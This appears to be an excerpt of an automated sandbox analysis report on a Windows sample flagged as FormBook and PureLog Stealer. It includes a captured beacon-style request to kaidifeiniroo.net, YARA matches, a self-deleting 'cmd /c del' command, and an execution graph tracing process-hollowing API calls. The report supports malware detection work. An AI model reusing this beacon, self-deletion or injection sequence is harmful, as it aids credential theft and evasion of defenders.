                                                         Jul 23, 2024 18:32:32.323191881 CEST | 184 | OUT | GET /ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST0 HTTP/1.1
                                                        Host: www.kaidifeiniroo.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                         Jul 23, 2024 18:32:32.849812984 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                                        Date: Tue, 23 Jul 2024 16:32:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4514
                                                        Connection: close
                                                        X-Frame-Options: SAMEORIGIN
                                                        Referrer-Policy: same-origin
                                                        Cache-Control: max-age=15
                                                        Expires: Tue, 23 Jul 2024 16:32:47 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MTvpXyb%2BSeOxPw0qfZqdVYrhk0bD8wHuyWRKMZvHGN7KkyFmSadcxRdgYjPjnnCfXy%2B9e8gLGunCJMD6HNGJzbKrGOicX%2B1iqkuqf7J4E7MU4VSlLXYVUqIpSdRAzvvVCLYZxo4FyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                        Server-Timing: cfRequestDuration;dur=13.000011
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        X-Permitted-Cross-Domain-Policies: none
                                                        X-Download-Options: noopen
                                                        Server: cloudflare
                                                        CF-RAY: 8a7d112cc8f47c90-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</ti
                                                         Jul 23, 2024 18:32:32.850794077 CEST | 1236 | IN | Data Raw: 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20
                                                        Data Ascii: tle><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width
                                                         Jul 23, 2024 18:32:32.850830078 CEST | 1236 | IN | Data Raw: 63 65 73 73 22 3e 59 6f 75 20 61 72 65 20 75 6e 61 62 6c 65 20 74 6f 20 61 63 63 65 73 73 3c 2f 73 70 61 6e 3e 20 6d 79 73 68 6f 70 69 66 79 2e 63 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72
                                                        Data Ascii: cess">You are unable to access</span> myshopify.com</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full">
                                                         Jul 23, 2024 18:32:32.853863955 CEST | 1236 | IN | Data Raw: 67 65 20 63 61 6d 65 20 75 70 20 61 6e 64 20 74 68 65 20 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 20 66 6f 75 6e 64 20 61 74 20 74 68 65 20 62 6f 74 74 6f 6d 20 6f 66 20 74 68 69 73 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                        Data Ascii: ge came up and the Cloudflare Ray ID found at the bottom of this page.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center s
                                                         Jul 23, 2024 18:32:32.853897095 CEST | 441 | IN | Data Raw: 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63
                                                        Data Ascii: List"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoa



                                                        Target ID:3
                                                        Start time:12:28:03
                                                        Start date:23/07/2024
                                                        Path:C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                                                        Imagebase:0xfb0000
                                                        File size:803'328 bytes
                                                        MD5 hash:FAB057E49C317D42F565EF0EFE766557
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1306814449.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:12:28:05
                                                        Start date:23/07/2024
                                                        Path:C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                                                        Imagebase:0x4b0000
                                                        File size:803'328 bytes
                                                        MD5 hash:FAB057E49C317D42F565EF0EFE766557
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:12:28:06
                                                        Start date:23/07/2024
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff70ffd0000
                                                        File size:5'141'208 bytes
                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:14
                                                        Start time:12:28:09
                                                        Start date:23/07/2024
                                                        Path:C:\Windows\SysWOW64\cmmon32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\cmmon32.exe"
                                                        Imagebase:0x330000
                                                        File size:36'352 bytes
                                                        MD5 hash:DEC326E5B4D23503EA5176878DDDB683
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:15
                                                        Start time:12:28:13
                                                        Start date:23/07/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:12:28:13
                                                        Start date:23/07/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:8.5%
                                                          Dynamic/Decrypted Code Coverage:99%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:310
                                                          Total number of Limit Nodes:15
                                                          execution_graph 47536 650e600 FindCloseChangeNotification 47537 650e667 47536->47537 47392 64e7feb 47393 64e7ff5 47392->47393 47396 64e7ac4 47393->47396 47395 64e803a 47397 64e7acf 47396->47397 47398 64eb273 47397->47398 47401 18f8da8 47397->47401 47408 18f74c4 47397->47408 47398->47395 47402 18f8de3 47401->47402 47404 18f906b 47402->47404 47415 18fb318 47402->47415 47403 18f90a9 47403->47398 47404->47403 47419 18fd3f8 47404->47419 47424 18fd3e8 47404->47424 47409 18f74cf 47408->47409 47411 18f906b 47409->47411 47414 18fb318 2 API calls 47409->47414 47410 18f90a9 47410->47398 47411->47410 47412 18fd3e8 4 API calls 47411->47412 47413 18fd3f8 4 API calls 47411->47413 47412->47410 47413->47410 47414->47411 47429 18fb340 47415->47429 47433 18fb350 47415->47433 47416 18fb32e 47416->47404 47420 18fd419 47419->47420 47421 18fd43d 47420->47421 47456 18fd598 47420->47456 47460 18fd5a8 47420->47460 47421->47403 47425 18fd419 47424->47425 47426 18fd43d 47425->47426 47427 18fd598 4 API calls 47425->47427 47428 18fd5a8 4 API calls 47425->47428 47426->47403 47427->47426 47428->47426 47430 18fb350 47429->47430 47436 18fb43b 47430->47436 47431 18fb35f 47431->47416 47435 18fb43b 2 API calls 47433->47435 47434 18fb35f 47434->47416 47435->47434 47437 18fb459 47436->47437 47438 18fb47c 47436->47438 47437->47438 47444 18fb6d0 47437->47444 47448 18fb6e0 47437->47448 47438->47431 47439 18fb474 47439->47438 47440 18fb680 GetModuleHandleW 47439->47440 47441 18fb6ad 47440->47441 47441->47431 47445 18fb6e0 47444->47445 47447 18fb719 47445->47447 47452 18fa7d0 47445->47452 47447->47439 47449 18fb6f4 47448->47449 47450 18fb719 47449->47450 47451 18fa7d0 LoadLibraryExW 47449->47451 47450->47439 47451->47450 47453 18fb8a0 LoadLibraryExW 47452->47453 47455 18fb919 47453->47455 47455->47447 47457 18fd5b5 47456->47457 47458 18fd5ef 47457->47458 47464 18fc170 47457->47464 47458->47421 47461 18fd5b5 47460->47461 47462 18fd5ef 47461->47462 
47463 18fc170 4 API calls 47461->47463 47462->47421 47463->47462 47465 18fc17b 47464->47465 47467 18fe308 47465->47467 47468 18fd794 47465->47468 47467->47467 47469 18fd79f 47468->47469 47470 18f74c4 4 API calls 47469->47470 47471 18fe377 47470->47471 47475 64e01b8 47471->47475 47481 64e01a0 47471->47481 47472 18fe3b1 47472->47467 47476 64e01e9 47475->47476 47478 64e02e9 47475->47478 47477 64e01f5 47476->47477 47487 64e0fff 47476->47487 47492 64e1010 47476->47492 47477->47472 47478->47472 47483 64e02e9 47481->47483 47484 64e01e9 47481->47484 47482 64e01f5 47482->47472 47483->47472 47484->47482 47485 64e0fff 2 API calls 47484->47485 47486 64e1010 2 API calls 47484->47486 47485->47483 47486->47483 47488 64e103b 47487->47488 47489 64e10ea 47488->47489 47497 64e1ee0 47488->47497 47501 64e1dd0 47488->47501 47493 64e103b 47492->47493 47494 64e10ea 47493->47494 47495 64e1ee0 2 API calls 47493->47495 47496 64e1dd0 2 API calls 47493->47496 47495->47494 47496->47494 47500 64e1dd0 2 API calls 47497->47500 47509 64e1f30 47497->47509 47498 64e1f15 47498->47489 47500->47498 47502 64e1ee6 47501->47502 47504 64e1f1e CreateWindowExW 47501->47504 47503 64e1f15 47502->47503 47507 64e1f30 CreateWindowExW 47502->47507 47508 64e1dd0 CreateWindowExW 47502->47508 47503->47489 47506 64e2054 47504->47506 47507->47503 47508->47503 47510 64e1f98 CreateWindowExW 47509->47510 47512 64e2054 47510->47512 47517 18fdac8 47518 18fdb0e 47517->47518 47522 18fdc98 47518->47522 47525 18fdca8 47518->47525 47519 18fdbfb 47528 18fd734 47522->47528 47526 18fdcd6 47525->47526 47527 18fd734 DuplicateHandle 47525->47527 47526->47519 47527->47526 47529 18fdd10 DuplicateHandle 47528->47529 47531 18fdcd6 47529->47531 47531->47519 47553 7cf69a6 47554 7cf690c 47553->47554 47555 7cf6a49 47554->47555 47559 7cf73be 47554->47559 47576 7cf7358 47554->47576 47592 7cf7348 47554->47592 47560 7cf734c 47559->47560 47561 7cf73c1 47559->47561 47608 7cf790f 47560->47608 47612 7cf7e32 47560->47612 47617 7cf78b7 47560->47617 
47622 7cf77f7 47560->47622 47626 7cf7c17 47560->47626 47634 7cf7c59 47560->47634 47642 7cf79fa 47560->47642 47647 7cf7f1b 47560->47647 47651 7cf7adc 47560->47651 47656 7cf795d 47560->47656 47661 7cf7b3d 47560->47661 47666 7cf7be9 47560->47666 47671 7cf7769 47560->47671 47561->47554 47562 7cf737a 47562->47554 47577 7cf7372 47576->47577 47579 7cf790f 2 API calls 47577->47579 47580 7cf7769 2 API calls 47577->47580 47581 7cf7be9 2 API calls 47577->47581 47582 7cf7b3d 2 API calls 47577->47582 47583 7cf795d 2 API calls 47577->47583 47584 7cf7adc 2 API calls 47577->47584 47585 7cf7f1b 2 API calls 47577->47585 47586 7cf79fa 2 API calls 47577->47586 47587 7cf7c59 4 API calls 47577->47587 47588 7cf7c17 4 API calls 47577->47588 47589 7cf77f7 2 API calls 47577->47589 47590 7cf78b7 2 API calls 47577->47590 47591 7cf7e32 2 API calls 47577->47591 47578 7cf737a 47578->47554 47579->47578 47580->47578 47581->47578 47582->47578 47583->47578 47584->47578 47585->47578 47586->47578 47587->47578 47588->47578 47589->47578 47590->47578 47591->47578 47593 7cf734c 47592->47593 47595 7cf790f 2 API calls 47593->47595 47596 7cf7769 2 API calls 47593->47596 47597 7cf7be9 2 API calls 47593->47597 47598 7cf7b3d 2 API calls 47593->47598 47599 7cf795d 2 API calls 47593->47599 47600 7cf7adc 2 API calls 47593->47600 47601 7cf7f1b 2 API calls 47593->47601 47602 7cf79fa 2 API calls 47593->47602 47603 7cf7c59 4 API calls 47593->47603 47604 7cf7c17 4 API calls 47593->47604 47605 7cf77f7 2 API calls 47593->47605 47606 7cf78b7 2 API calls 47593->47606 47607 7cf7e32 2 API calls 47593->47607 47594 7cf737a 47594->47554 47595->47594 47596->47594 47597->47594 47598->47594 47599->47594 47600->47594 47601->47594 47602->47594 47603->47594 47604->47594 47605->47594 47606->47594 47607->47594 47675 7cf6268 47608->47675 47679 7cf6261 47608->47679 47609 7cf77c4 47609->47562 47614 7cf7a14 47612->47614 47613 7cf819e 47613->47562 47614->47613 47615 7cf6268 WriteProcessMemory 47614->47615 47616 7cf6261 WriteProcessMemory 
47614->47616 47615->47614 47616->47614 47618 7cf78bd 47617->47618 47619 7cf77c4 47618->47619 47620 7cf6268 WriteProcessMemory 47618->47620 47621 7cf6261 WriteProcessMemory 47618->47621 47619->47562 47620->47619 47621->47619 47623 7cf7812 47622->47623 47683 7cf5be8 47623->47683 47687 7cf5be0 47623->47687 47627 7cf7c60 47626->47627 47628 7cf7812 47627->47628 47629 7cf77c4 47627->47629 47691 7cf84b1 47627->47691 47696 7cf84c0 47627->47696 47632 7cf5be8 ResumeThread 47628->47632 47633 7cf5be0 ResumeThread 47628->47633 47629->47562 47632->47628 47633->47628 47635 7cf7c5f 47634->47635 47636 7cf7812 47635->47636 47637 7cf77c4 47635->47637 47638 7cf84b1 2 API calls 47635->47638 47639 7cf84c0 2 API calls 47635->47639 47640 7cf5be8 ResumeThread 47636->47640 47641 7cf5be0 ResumeThread 47636->47641 47637->47562 47638->47636 47639->47636 47640->47636 47641->47636 47643 7cf7a14 47642->47643 47644 7cf819e 47643->47644 47645 7cf6268 WriteProcessMemory 47643->47645 47646 7cf6261 WriteProcessMemory 47643->47646 47644->47562 47645->47643 47646->47643 47709 7cf61a8 47647->47709 47713 7cf61a1 47647->47713 47648 7cf7f41 47652 7cf7ae2 47651->47652 47717 7cf6358 47652->47717 47721 7cf6351 47652->47721 47653 7cf7f78 47653->47653 47657 7cf7977 47656->47657 47657->47562 47659 7cf6358 ReadProcessMemory 47657->47659 47660 7cf6351 ReadProcessMemory 47657->47660 47658 7cf7f78 47659->47658 47660->47658 47662 7cf7b43 47661->47662 47664 7cf6358 ReadProcessMemory 47662->47664 47665 7cf6351 ReadProcessMemory 47662->47665 47663 7cf7f78 47664->47663 47665->47663 47667 7cf7e48 47666->47667 47669 7cf5c98 Wow64SetThreadContext 47667->47669 47670 7cf5c90 Wow64SetThreadContext 47667->47670 47668 7cf7e63 47669->47668 47670->47668 47725 7cf64e4 47671->47725 47729 7cf64f0 47671->47729 47676 7cf62b0 WriteProcessMemory 47675->47676 47678 7cf6307 47676->47678 47678->47609 47680 7cf6268 WriteProcessMemory 47679->47680 47682 7cf6307 47680->47682 47682->47609 47684 7cf5c28 ResumeThread 47683->47684 47686 7cf5c59 
47684->47686 47686->47623 47688 7cf5be8 ResumeThread 47687->47688 47690 7cf5c59 47688->47690 47690->47623 47692 7cf84c0 47691->47692 47701 7cf5c98 47692->47701 47705 7cf5c90 47692->47705 47693 7cf84eb 47693->47628 47697 7cf84d5 47696->47697 47699 7cf5c98 Wow64SetThreadContext 47697->47699 47700 7cf5c90 Wow64SetThreadContext 47697->47700 47698 7cf84eb 47698->47628 47699->47698 47700->47698 47702 7cf5cdd Wow64SetThreadContext 47701->47702 47704 7cf5d25 47702->47704 47704->47693 47706 7cf5c98 Wow64SetThreadContext 47705->47706 47708 7cf5d25 47706->47708 47708->47693 47710 7cf61e8 VirtualAllocEx 47709->47710 47712 7cf6225 47710->47712 47712->47648 47714 7cf61a8 VirtualAllocEx 47713->47714 47716 7cf6225 47714->47716 47716->47648 47718 7cf63a3 ReadProcessMemory 47717->47718 47720 7cf63e7 47718->47720 47720->47653 47722 7cf6358 ReadProcessMemory 47721->47722 47724 7cf63e7 47722->47724 47724->47653 47726 7cf64f0 CreateProcessA 47725->47726 47728 7cf673b 47726->47728 47728->47728 47730 7cf6579 CreateProcessA 47729->47730 47732 7cf673b 47730->47732 47732->47732 47538 64e7e95 47539 64e7e9f 47538->47539 47540 64e7ac4 4 API calls 47539->47540 47541 64e7ea8 47540->47541 47542 64e7ac4 4 API calls 47541->47542 47543 64e7ec6 47542->47543 47544 64e7ac4 4 API calls 47543->47544 47545 64e7ee4 47544->47545 47733 158d1b4 47734 158d1cc 47733->47734 47735 158d226 47734->47735 47740 64e20e8 47734->47740 47745 64e20d7 47734->47745 47750 64e2e38 47734->47750 47755 64e2e48 47734->47755 47741 64e210e 47740->47741 47743 64e2e48 2 API calls 47741->47743 47744 64e2e38 2 API calls 47741->47744 47742 64e212f 47742->47735 47743->47742 47744->47742 47746 64e20e5 47745->47746 47748 64e2e48 2 API calls 47746->47748 47749 64e2e38 2 API calls 47746->47749 47747 64e212f 47747->47735 47748->47747 47749->47747 47751 64e2e75 47750->47751 47752 64e2ea7 47751->47752 47760 64e2fc0 47751->47760 47765 64e2fd0 47751->47765 47757 64e2e75 47755->47757 47756 64e2ea7 47757->47756 47758 64e2fc0 2 API calls 47757->47758 
47759 64e2fd0 2 API calls 47757->47759 47758->47756 47759->47756 47762 64e2fe4 47760->47762 47761 64e3070 47761->47752 47770 64e3088 47762->47770 47773 64e3079 47762->47773 47767 64e2fe4 47765->47767 47766 64e3070 47766->47752 47768 64e3088 2 API calls 47767->47768 47769 64e3079 2 API calls 47767->47769 47768->47766 47769->47766 47771 64e3099 47770->47771 47776 64e4641 47770->47776 47771->47761 47774 64e3099 47773->47774 47775 64e4641 2 API calls 47773->47775 47774->47761 47775->47774 47780 64e4660 47776->47780 47784 64e4670 47776->47784 47777 64e465a 47777->47771 47781 64e46b2 47780->47781 47783 64e46b9 47780->47783 47782 64e470a CallWindowProcW 47781->47782 47781->47783 47782->47783 47783->47777 47785 64e46b2 47784->47785 47787 64e46b9 47784->47787 47786 64e470a CallWindowProcW 47785->47786 47785->47787 47786->47787 47787->47777 47513 64e7de0 47515 64e7e17 47513->47515 47514 64e7e1c 47514->47514 47515->47514 47516 64e7ac4 4 API calls 47515->47516 47516->47515 47532 64ec100 47533 64ec122 47532->47533 47534 18f8da8 4 API calls 47532->47534 47535 18f74c4 4 API calls 47532->47535 47534->47533 47535->47533 47546 7cf8a90 47547 7cf8c1b 47546->47547 47549 7cf8ab6 47546->47549 47549->47547 47550 7cf867c 47549->47550 47551 7cf8d10 PostMessageW 47550->47551 47552 7cf8d7c 47551->47552 47552->47549
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94a819ca0009ce2b239b5d52b0b34b36870f9c5761ab272932a4da4ba6cbb2c3
                                                          • Instruction ID: d34b94405943f9f7a88b1077ffe66d6a59e256b88c47264d7a343e133605fe99
                                                          • Opcode Fuzzy Hash: 94a819ca0009ce2b239b5d52b0b34b36870f9c5761ab272932a4da4ba6cbb2c3
                                                          • Instruction Fuzzy Hash: A1623A75A00618DFDB59CF68C988F99BBB2FF48300F1581A8E509AB261DB31ED52CF40
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1d03492c2de7a0b8c44dca782322b5b58a9dac07222a7b52f3717ded824c9fd
                                                          • Instruction ID: ce0306f76acc5465451b41cf86cd37f57e9d0c54950221f21cddf0490e7f5fcd
                                                          • Opcode Fuzzy Hash: e1d03492c2de7a0b8c44dca782322b5b58a9dac07222a7b52f3717ded824c9fd
                                                          • Instruction Fuzzy Hash: 89329FB1B012058FDB59DF69C590BAEB7F6AF89700F148469E60ADB390CB35EE01CB51
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301270727.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_64e0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0bf540b4de54b3930ea5ea8015e876021e89c99d8b8d82de5716595783d0fe8
                                                          • Instruction ID: e9af64c294d7ac2fd4b99636757db551973ba65b3f225c115872034a6ec23585
                                                          • Opcode Fuzzy Hash: f0bf540b4de54b3930ea5ea8015e876021e89c99d8b8d82de5716595783d0fe8
